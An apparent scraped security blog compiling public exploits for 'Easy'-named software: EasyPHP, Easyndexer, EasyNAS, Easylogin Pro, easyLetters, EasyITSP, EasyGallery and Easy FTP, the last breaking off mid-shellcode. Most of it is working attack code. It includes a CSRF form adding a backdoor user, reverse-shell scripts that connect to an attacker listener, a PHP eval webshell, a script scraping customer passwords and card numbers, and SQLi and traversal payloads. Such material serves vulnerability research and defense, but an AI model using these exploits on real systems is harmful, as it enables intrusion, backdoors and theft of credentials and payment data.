[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/EASYPHP-DEV-SERVER-REMOTE-CMD-EXECUTION.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.easyphp.org
Product:
=============================
EasyPHP Devserver v16.1.1
easyphp-devserver-16.1.1-setup.exe
hash: 64184d330a34be9e6c029ffa63c903de
A complete WAMP environment for PHP development & personal web hosting.
Host with Webserver PHP, Apache, MySQL, Nginx, PhpMyAdmin,
Xdebug, PostgreSQL, MongoDB, Python, Ruby...for Windows.
Vulnerability Type:
=================================
CSRF / Remote Command Execution
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
EasyPHP Devserver dashboard runs on port 1111, the PHP code contains
mulitple RCE vectors, which can allow
arbitrary OS commands to be executed on the target system by remote
attackers, if a user visits malicious webpage or link.
The "index.php" and "explorer.php" files both contain vulnerable code that
will happily process both GET / POST RCE requests.
Below EasyPHP Code contains no CSRF token or checks whatsoever. All
attacker needs is to supply 'type' and command values.
Possibility for RFI (remote file inclusion) if the "allow_url_include=0"
setting is changed in "php.ini" configuration.
No checks or CSRF tokens for PHP include directives either, the default
however is set to Off.
e.g. RFI attempt result
Warning: include(): http:// wrapper is disabled in the server configuration
by allow_url_include=0
line 8 of "explorer.php"
======================
//== ACTIONS
==================================================================
if (isset($_POST['action'])) {
// Include and exec
if (isset($_POST['action']['request'])) {
foreach ($_POST['action']['request'] as $request) {
if ($request['type'] == 'include') include(urldecode($request['value']));
if ($request['type'] == 'exe') exec(urldecode($request['value']));
}
}
$redirect = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
header("Location: " . $redirect);
exit;
}
//////////////////////////////////////////////////
line 48 "index.php"
==================
//== ACTIONS
==================================================================
if (isset($_POST['action'])) {
// Include and exec
if (isset($_POST['action']['request'])) {
foreach ($_POST['action']['request'] as $request) {
if ($request['type'] == 'include') include(urldecode($request['value']));
if ($request['type'] == 'exe') exec(urldecode($request['value']));
}
}
sleep(1);
$redirect = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
header("Location: " . $redirect);
exit;
}
if (isset($_GET['action'])) {
// Include and exec
if ($_GET['action'] == 'include') include(urldecode($_GET['value']));
if ($_GET['action'] == 'exe') exec(urldecode($_GET['value']));
if (isset($_GET['redirect'])) {
$redirect = urldecode($_GET['redirect']);
} else {
$redirect = 'http://127.0.0.1:1111/index.php';
}
sleep(1);
header("Location: " . $redirect);
exit;
}
Exploit code(s):
===============
1) Add Backdoor User Account
<form action="http://127.0.0.1:1111/explorer.php" method="post">
<input type="hidden" name="action[request][0][type]" value="exe">
<input type="hidden" name="action[request][0][value]" value="net user EVIL
Password /add">
<script>document.forms[0].submit()</script>
</form>
2) Run "calc.exe"
<a href="http://127.0.0.1:1111/index.php?action=exe&value=calc.exe
">Clicky...</a>
Disclosure Timeline:
======================================
Vendor Notification: No replies
November 22, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863158450
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/47145/info
EasyPHP is prone to a vulnerability that lets attackers to download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.
EasyPHP 5.3.5.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# ********* In The name of Allah ************
###
# Title : EasyPHP Web Server 5.3.5.0 Remote File Download Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Remote Content/Download File
# Tested on : Windows XP SP3 Fran�ais
# Target : EasyPHP 5.3.5.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# EasyPHP Web Server is vulnerable for a Remote File Download attcak, the following code will exploit the bug.
# The vulnerability allows an unprivileged attacker to download files whom he has no permissions to.
# ------------
# ********* In The name of Allah ************
system("title KedAns-Dz");
system("color 1e");
system("cls");
sleep(1);
# Start Exploit : ** Allah Akbar **
use LWP::Simple;
if (@ARGV < 3) {
print("\r\n");
print("=================================================================\r\n");
print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");
print("=================================================================\r\n");
print(" [!] Usage: " .$0. " <host> <port> <file>\r\n");
print(" [!] HOST - An host using EasyPHP Web Server\r\n");
print(" [!] PORT - Port number\r\n");
print(" [!] FILE - The file you want to get\r\n");
print(" [!] Example: " .$0. " targetserver.com 80 index.php\r\n");
print("=================================================================\r\n\r\n");
sleep(1);
exit(1);
# ** Allah Akbar **
} else {
print("=================================================================\n");
print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");
print("=================================================================\r\n\r\n");
sleep(2);
($host, $port, $file) = @ARGV;
$content = get("http://" .$host. ":" .$port. "/" .$file. ".");
print(" [+] File Content:\r\n\r\n");
sleep(2);
print($content. "\r\n");
open (KDZ ,">","KedAns.log");
print KDZ "Log File Exploited By KedAns-Dz <ked-h(at)hotmail(dot)com>\r\n" .
"Greets All Hackers Moslems & All My Friends \r\n" .
"Target : http://$host:$port/$file \r\n" .
"File Content : \n\n" .
"=============================\r\n\n" .
"$content";
print("\r\n");
print("=================================================================\n");
print "\n[+++] Creating And Download the Target File Content in KedAns.log \n";
}
# ** In The Peace of Allah **
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
source: https://www.securityfocus.com/bid/52781/info
EasyPHP is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/home/sqlite/main.php?dbsel=1&table=t1'
source: https://www.securityfocus.com/bid/58945/info
EasyPHP is prone to an authentication bypass and a PHP code execution vulnerability.
Attackers may exploit these issues to gain unauthorized access to the affected application and perform arbitrary actions or execute arbitrary PHP code within the context of the web server process. Successful attacks can compromise the affected application and possibly the underlying computer.
EasyPHP 12.1 is vulnerable; other versions may also be affected.
http://www.example.com/home/index.php?to=ext
http://www.example.com/home/index.php?to=phpinfo
# Exploit Title: Easyndexer 1.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-11-10
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/easyndexer/
# Software Link: https://ayera.dl.sourceforge.net/project/easyndexer/easyndexer_win32.exe
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/src/createuser.php
#
POST /[PATH]/src/createuser.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
username=efe&password=efe&name=OMer&surname=Efe&privileges=1
HTTP/1.1 200 OK
Date: Sat, 10 Nov 2018 17:12:54 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=fuiv6a0p3jnu15ggcphj624e74; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 127
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/src/createuser.php
#
<html>
<body>
<tr>
<form action="http://localhost/ExploitDb/easyndexer/src/createuser.php" method="POST">
<td>New:</td>
<td><input name="username" type="text"></td>
<td><input name="password" type="text"></td>
<td><input name="name" type="text"></td>
<td><input name="surname" type="text"></td>
<td><select name="privileges">
<option value="1">Administrator</option>
<option value="2">Manager</option>
<option value="3">User</option>
<option value="4">Guest</option>
<option value="5">Translator</option>
</select></td>
<td><input value="Create" title="Creates a new user" type="submit"></td>
<td><input value="Reset" title="Reset data" type="reset"></td>
</form>
</tr>
</body>
</html>
# POC: Database File Download
# 3)
# http://localhost/[PATH]/databases/generaldb.db
#
GET /[PATH]/databases/generaldb.db HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fuiv6a0p3jnu15ggcphj624e74
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 10 Nov 2018 17:15:04 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
Last-Modified: Sat, 10 Nov 2018 17:12:54 GMT
Etag: "1400-57a52941eade9"
Accept-Ranges: bytes
Content-Length: 5120
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
# Exploit Title: Easyndexer 1.0 - Arbitrary File Download
# Dork: N/A
# Date: 2018-11-10
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/easyndexer/
# Software Link: https://ayera.dl.sourceforge.net/project/easyndexer/easyndexer_win32.exe
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/src/showtif.php?file=[FILE]&name=Efe
#
POST /[PATH]/src/showtif.php?file=C:/Windows/win.ini&name=Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 10 Nov 2018 18:07:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=du96l4lnqqcrmb8jamqk0ntib5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Disposition: attachment; filename=Efe.ini
Content-Length: 564
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
# Exploit Title: EasyNas 1.1.0 - OS Command Injection
# Date: 2023-02-9
# Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com)
# Author Blog: https://xbz0n.medium.com
# Version: 1.0.0
# Vendor home page : https://www.easynas.org
# Authentication Required: Yes
# CVE : CVE-2023-0830
#!/usr/bin/python3
import requests
import sys
import base64
import urllib.parse
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Disable the insecure request warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) < 6:
print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
sys.exit()
url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
# Create the payload
payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5])
# Encode the payload in base64
payload = base64.b64encode(payload.encode()).decode()
# URL encode the payload
payload = urllib.parse.quote(payload)
# Create the login data
login_data = {
'usr':user,
'pwd':password,
'action':'login'
}
# Create a session
session = requests.Session()
# Send the login request
print("Sending login request...")
login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False)
# Check if the login was successful
if 'Login to EasyNAS' in login_response.text:
print("Unsuccessful login")
sys.exit()
else:
print("Login successful")
# send the exploit request
timeout = 3
try:
exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False)
if exploit_response.status_code != 200:
print("[+] Everything seems ok, check your listener.")
else:
print("[-] Exploit failed, system is patched or credentials are wrong.")
except requests.exceptions.ReadTimeout:
print("[-] Everything seems ok, check your listener.")
sys.exit()
#!/usr/bin/php
<?php
/*
Easylogin Pro Encryptor.php Unserialize Remote Code Execution Vulnerability
Version: 1.3.0
Platform: Ubuntu Server 18.04.1
Bug found by: @f99942
Tekniq/exploit by: @steventseeley (mr_me)
CVE: CVE-2018-15576
Notes:
======
- This is not really a security issue I guess, because you need to know the key.
But a simple disclosure bug could mean its game over for Easylogin Pro
- You will need PHP with threading support to run this exploit
- Laravel + Guzzle === lol
Example:
========
mr_me@pluto:~$ php -m | grep pthreads && php --version
pthreads
PHP 7.2.2 (cli) (built: Aug 10 2018 01:30:10) ( ZTS DEBUG )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
with Zend OPcache v7.2.2, Copyright (c) 1999-2018, by Zend Technologies
mr_me@pluto:~$ ./e.php
Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
Bug found by: @f99942
Tekniq/exploit by: @steventseeley (mr_me)
----------------------------------------------------
Usage: php ./e.php -t <ip> -c <ip:port>
-t: target server (ip with or without port)
-c: connectback server (ip and port)
Example:
php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337
----------------------------------------------------
mr_me@pluto:~$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337
Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
bug found by: @f99942
tekniq/exploit by: @steventseeley (mr_me)
(+) snap...
(+) crackle...
(+) pop!
(+) connectback from 172.16.175.137 via port 41860
www-data@target:/var/www/html/uploads$ id;uname -a
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux target 4.15.0-30-generic #32-Ubuntu SMP Thu Jul 26 17:42:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
www-data@target:/var/www/html/uploads$ ls -la
total 12
drwxrwxrwx 2 www-data www-data 4096 Aug 12 23:06 .
drwxr-xr-x 9 www-data www-data 4096 Aug 9 14:49 ..
-rwxrwxrwx 1 root root 13 Dec 12 2017 .gitignore
www-data@target:/var/www/html/uploads$ php --version
PHP 7.2.7-0ubuntu0.18.04.2 (cli) (built: Jul 4 2018 16:55:24) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
with Zend OPcache v7.2.7-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies
www-data@target:/var/www/html/uploads$
*/
namespace GuzzleHttp\Cookie;
// change these to work against your target
$key = "OPudCtPyxzAGw8LkQowOoQAc88dvULGB";
$path = "/var/www/html";
class Encrypter {
protected $key;
protected $cipher;
public function __construct($key, $cipher = 'AES-256-CBC'){
$key = (string) $key;
$this->key = $key;
$this->cipher = $cipher;
}
public function encrypt($value, $serialize = true){
$iv = random_bytes(openssl_cipher_iv_length($this->cipher));
$value = openssl_encrypt(
$serialize ? serialize($value) : $value,
$this->cipher, $this->key, 0, $iv
);
if ($value === false) {
throw new EncryptException('Could not encrypt the data.');
}
$mac = $this->hash($iv = base64_encode($iv), $value);
$json = json_encode(compact('iv', 'value', 'mac'));
if (json_last_error() !== JSON_ERROR_NONE) {
throw new EncryptException('Could not encrypt the data.');
}
return base64_encode($json);
}
public function encryptString($value){
return $this->encrypt($value, false);
}
protected function hash($iv, $value){
return hash_hmac('sha256', $iv.$value, $this->key);
}
}
// pop chain
interface ToArrayInterface {}
class SetCookie implements ToArrayInterface {
private $data;
public function __construct(array $data = []){
$this->data = $data;
}
}
class CookieJar implements ToArrayInterface {
private $cookies;
public function setCookie(SetCookie $cookie){
$this->cookies = array($cookie);
}
}
class FileCookieJar extends CookieJar {
private $filename;
public function __construct($bd_file, $cbh, $cbp){
$this->filename = $bd_file;
$this->setCookie(new SetCookie(array(
"Value" => '<?php eval(base64_decode($_SERVER[HTTP_SI])); ?>',
"Expires" => true,
"Discard" => false,
)));
}
}
class Exploit{
private $target;
private $targetport;
private $cbhost;
private $cbport;
private $key;
private $path;
public function __construct($t, $tp, $cbh, $cbp, $k, $p){
$this->target = $t;
$this->targetport = $tp;
$this->cbhost = $cbh;
$this->cbport = $cbp;
$this->key = $k;
$this->path = $p;
}
public function run(){
// its possible to leak the path if app.php contains 'debug' => true
// also, uploads is writable by default for avatars
$fcj = new FileCookieJar("$this->path/uploads/si.php", $this->cbhost, $this->cbport);
$e = new Encrypter($this->key);
$this->p = $e->encryptString(serialize($fcj));
// hardcoded md5 of the class name 'Hazzard\Auth\Auth' for the cookie login
$c = $this->do_get("index.php", array("Cookie: login_ac5456751dd3c394383a14228642391e=$this->p"));
if ($c === 500){
print "(+) pop!\r\n";
// start our listener
$s = new Shell($this->cbport);
$s->start();
// msf reverse shell with some stuff modified
$rs = <<<'PHP'
@error_reporting(-1);
@set_time_limit(0);
@ignore_user_abort(1);
$dis=@ini_get('disable_functions');
if(!empty($dis)){
$dis=preg_replace('/[, ]+/', ',', $dis);
$dis=explode(',', $dis);
$dis=array_map('trim', $dis);
}else{
$dis=array();
}
$ipaddr='[cbhost]';
$port=[cbport];
function PtdSlhY($c){
global $dis;
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
$c=$c." 2>&1\n";
}
ob_start();
system($c);
$o=ob_get_contents();
ob_end_clean();
if (strlen($o) === 0){
$o = "NULL";
}
return $o;
}
// we disappear like a fart in the wind
@unlink("si.php");
$nofuncs='no exec functions';
$s=@fsockopen("tcp://$ipaddr",$port);
while($c=fread($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
}else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=PtdSlhY(substr($c,0,-1));
if($out===false){
fwrite($s, $nofuncs);
break;
}
}
fwrite($s,$out);
}
fclose($s);
PHP;
$rs = str_replace("[cbhost]", $this->cbhost, $rs);
$rs = str_replace("[cbport]", $this->cbport, $rs);
$php = base64_encode($rs);
$this->do_get("uploads/si.php", array("si: $php"));
}
}
private function do_get($p = "index.php", array $h = []){
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => "http://$this->target/$p",
CURLOPT_HTTPHEADER => $h,
CURLOPT_PORT => (int) $this->targetport
));
$resp = curl_exec($curl);
return curl_getinfo($curl, CURLINFO_HTTP_CODE);
}
}
class Shell extends \Thread{
private $cbport;
public function __construct($cbp){
$this->cbport = $cbp;
}
public function run(){
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$ret = @socket_bind($sock, 0, (int) $this->cbport);
$ret = @socket_listen($sock, 5);
$msgsock = @socket_accept($sock);
@socket_close($sock);
$start = true;
$fp = fopen("php://stdin", "r");
while(false !== @socket_select($r = array($msgsock))){
if ($start === true){
if (socket_getpeername($r[0], $a, $p) === true){
print "(+) connectback from $a via port $p\r\n";
$s = $this->exec_cmd($msgsock, "echo `whoami`@`hostname`:\n");
}
}
$start = false;
// the pretty shells illusion
print "\r\n".$s.$this->exec_cmd($msgsock, "echo `pwd`\n")."$ ";
// get our command...
$c = fgets($fp);
// if the attacker enters nothing, continue...
if (strpos("\n", $c) === 0){
continue;
}
if (strpos($c, "cd") === false){
print $this->exec_cmd($msgsock, $c);
}elseif (strpos($c, "cd") !== false){
$this->exec_cmd($msgsock, $c, false);
}
if(in_array($c, array("exit\n", "quit\n"))){
break;
}
}
fclose($fp);
}
private function exec_cmd($c, $cmd, $ret=true){
// send our command to the reverse shell
@socket_write($c, $cmd, strlen($cmd));
if ($ret == true){
// we don't care to get the shell prompt back...
$resp = trim(@socket_read($c, 2048, PHP_BINARY_READ));
if ($resp === "NULL"){
return "";
}else{
return $resp;
}
}
}
}
print_r("\r\nEasylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
Bug found by: @f99942
Tekniq/exploit by: @steventseeley (mr_me)\r\n");
if ($argc < 3) {
print_r("
----------------------------------------------------
Usage: php ".$argv[0]." -t <ip> -c <ip:port>
-t: target server (ip with or without port)
-c: connectback server (ip and port)
Example:
php ".$argv[0]." -t 172.16.175.136 -c 172.16.175.137:1337
----------------------------------------------------
"); die; }
function set_args($argv) {
$_ARG = array();
foreach ($argv as $arg) {
if (preg_match("/--([^=]+)=(.*)/", $arg, $reg)) {
$_ARG[$reg[1]] = $reg[2];
} elseif(preg_match("/^-([a-zA-Z0-9])/", $arg, $reg)) {
$_ARG[$reg[1]] = "true";
} else {
$_ARG["input"][] = $arg;
}
}
return $_ARG;
}
$args = set_args($argv);
$host = $args["input"]["1"];
$cbsp = $args["input"]["2"];
if (strpos($host, ":") == true){
$host_and_port = explode(":", $host);
$host = $host_and_port[0];
$port = $host_and_port[1];
}else{
$port = 80;
}
if (strpos($cbsp, ":") == true){
$cbhost_and_cbport = explode(":", $cbsp);
$cbhost = $cbhost_and_cbport[0];
$cbport = $cbhost_and_cbport[1];
}else{
$cbport = 1337;
}
$ip_regex = "(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b)";
if ((preg_match($ip_regex, $host) === 1) && (preg_match($ip_regex, $cbhost) === 1)){
// exploit entry
$poc = new Exploit($host, $port, $cbhost, $cbport, $key, $path);
print "\r\n(+) snap...\r\n(+) crackle...\r\n";
$poc->run();
}
/*
eyJpdiI6InFGcWFDMW9aMEFwWmo2XC9RRkhxZ3JBPT0iLCJ2YWx1ZSI6IjdpVExUQWpaYVpu
RjVVRElxczg1YUVpSWl2bEtXOVwvY3BVaDFkc0NNY0Y4NkhMME9XNE9PZHJxc0FhUFBlenpi
VWtJSUNHWE9RYU5MQjVnOUgzUkt4RGc0QlE4TDNZSnpueFZlblVjM3NnVXFmeE0zSnZaRFA2
a2gxU1l2QlVYNW5pUkZEd3c2RFJWYnpqRFkyUmdOQW5vZkVtaFA0Y2JDRW1kUU5mNWtGdmh3
WDJWYlBmQU0rTkFwWExQOERWcEZDVTYzU255VEFaTzN4MzhZTEUxWElRbnNCZ1grWm9rN3Vh
MzBzSnYrSGpjMmlRRWMxZWVTbDVhN29uOG1RazBJIiwibWFjIjoiOThmYTM5ZDc3M2FlMGVh
NTI3ZWI2ZGNkODQ5N2ZmZmExNDA3YjdjYzYzMGRlODY3NDZmMjRkYTBiNmVjMGJmMCJ9
*/
?>
# Exploit Title: easyLetters 1.0 - 'id' SQL Injection
# Dork: N/A
# Date: 25.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/easyletters/5281396
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
====================================================
# Demo : http://pauloreg.com/newsletter/
# PoC : SQLi :
http://test.com/newsletter/e-mails.php?id=[SQLi]
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
====================================================
source: https://www.securityfocus.com/bid/57741/info
EasyITSP is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary files in the context of the application. This may aid in further attacks.
EasyITSP 2.0.7 and prior versions are vulnerable.
http://www.example.com/WEB/customer/voicemail.php?currentpage=phones&folder=../../
source: https://www.securityfocus.com/bid/56321/info
EasyITSP is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and gain unauthorized access to customer's information.
EasyITSP 2.0.2 is vulnerable; other versions may also be affected.
<?php
error_reporting(0);
$arguments = getopt("a:b:c:");
$url = $arguments['a'];
$id_pod =$arguments['b'];
$id_end =$arguments['c'];
if(count($arguments)!=3)
{
echo '## Exploit - EasyITSP by Lemens Telephone Systems 2.0.2 '."\n";
echo '## Discovery users with passwords '."\n";
echo '## '."\n";
echo '## Author: Michal Blaszczak '."\n";
echo '## Website: blaszczakm.blogspot.com '."\n";
echo '## Date: 10.10.2012 '."\n";
echo '## '."\n";
echo '## Greatz: cond, packet, jestemka1pi, sid, chez '."\n";
echo '## #pakamera@freenode '."\n";
echo '## (old) #2600@ircnet '."\n";
echo '## (old) #mamo_mamo_jestem_chakerem@ircnet '."\n";
echo '## '."\n";
echo '## Usage: '."\n";
echo '## php exploit.php -a URL -b ID_START -c ID_STOP '."\n";
echo '## '."\n";
echo '## Example: '."\n";
echo '## php exploit.php -a http://lemens-ts.com/easyitsp/customer/ -b
5 -c 10'."\n";
exit;
}
$url2='customers_edit.php?currentpage=customers';
$url.=$url2;
for ($id_pod; $id_pod <= $id_end; $id_pod++) { $cookie = 'cust_verify=' . urlencode('#pakamera') . '; cust_id=' .
urlencode($id_pod);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_COOKIE, $cookie); curl_setopt($ch, CURLOPT_POST, 1);//przesylamy metod. post curl_setopt($ch, CURLOPT_POSTFIELDS, "customersid=$id_pod"); //dane do wyslania curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $intro = curl_exec($ch); curl_close($ch);
$regex_login = '#\<td title="Customer username for
portal"\>(.+?)\<\/td\>#s';
preg_match($regex_login, $intro, $login);
$regex_pass = '#\<td title="Customer password for portal"><input
type="password" name="password" required="1" maxlength="45"
value="(.+?)"\>\<\/td\>#s';
preg_match($regex_pass, $intro, $pass);
$regex_ccnum = '#\<td title="Customer cc number"><input type="text"
name="ccnumber" maxlength="20" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccnum, $intro, $ccnum);
$regex_ccexpire = '#\<td title="Customer cc expire"><input type="text"
name="ccexpire" maxlength="8" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccexpire, $intro, $ccexpire);
$regex_cccvv = '#\<td title="Customer credit card CVV"><input
type="text" name="cccvv" maxlength="6" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_cccvv, $intro, $cccvv);
$test = explode(" ",$login[1]);
if(trim($test[0])!='</td>')
{
echo 'ID:'.$id_pod."\n";
echo 'LOGIN:'.$login[1]."\n";
echo 'Password:'.$pass[1]."\n";
echo 'CCnumber:'.$ccnum[1]."\n";
echo 'CCexpire:'.$ccexpire[1]."\n";
echo 'CCCVV:'.$cccvv[1]."\n\n";
}
}
?>
source: https://www.securityfocus.com/bid/49458/info
EasyGallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/easygallery/index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1
http://www.example.com/easygallery/index.php?do=<SQL Injection Code>&page=register&PageSection=0
#!/usr/bin/env python
# -*- coding: latin-1 -*- # ####################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ nullsecurity team #
# #
# Easy FTP server remote exploit #
# #
# DATE #
# 03/03/2012 #
# #
# DESCRIPTION #
# Easy FTP Server - "APPE" command buffer overflow - remote exploit #
# #
# AUTHOR #
# Swappage - http://www.nullsecurity.net/ #
# #
################################################################################
import socket
username = "anonymous"
password = "a@a"
hostname = "192.168.1.143"
port = 21
#009BFE69 <--- where to go
#009BFC6C <--- value of ESP
# increment ESP and add patch to that memory location
patch=("\xcc"
"\x89\xe3"
